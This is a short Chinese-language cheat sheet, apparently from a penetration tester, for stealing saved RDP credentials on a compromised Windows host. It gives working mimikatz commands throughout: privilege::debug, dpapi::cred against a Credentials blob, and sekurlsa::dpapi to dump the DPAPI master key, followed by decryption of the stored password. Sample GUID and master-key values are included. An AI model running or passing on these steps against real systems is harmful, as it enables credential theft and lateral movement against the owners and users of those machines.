查看rdp连接记录:
前提是目标在RDP连接是勾选了保存凭证:
查找本地的Credentials :
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
获取guidMasterKey:
只要是同一个登录的用户,他保存的凭证的guidMasterKey都是一样的。
Privilege::debug
dpapi::cred /in:C:\Users\yang\AppData\Local\Microsoft\Credentials\AF29D0CB13A586962EC0A626269806BD
目标guidMasterKey值为9380bd81-1a55-4b0d-af3b-2a69fe876968
继续获得MasterKey:
sekurlsa::dpapi
通过GUID:9380bd81-1a55-4b0d-af3b-2a69fe876968
获得对应的MasterKey:7788e2c1bd5b9642f3da841b86edbd4e26f9b5af85f458c9fb4a9c858ea5c730b1abaecbf5ee1ec7fd7b4ace41f49b8be7d95577bcae9845cb599fbbffe745bc
解密凭证密码:
dpapi::cred /in:C:\Users\yang\AppData\Local\Microsoft\Credentials\AF29D0CB13A586962EC0A626269806BD /masterkey:7788e2c1bd5b9642f3da841b86edbd4e26f9b5af85f458c9fb4a9c858ea5c730b1abaecbf5ee1ec7fd7b4ace41f49b8be7d95577bcae9845cb599fbbffe745bc
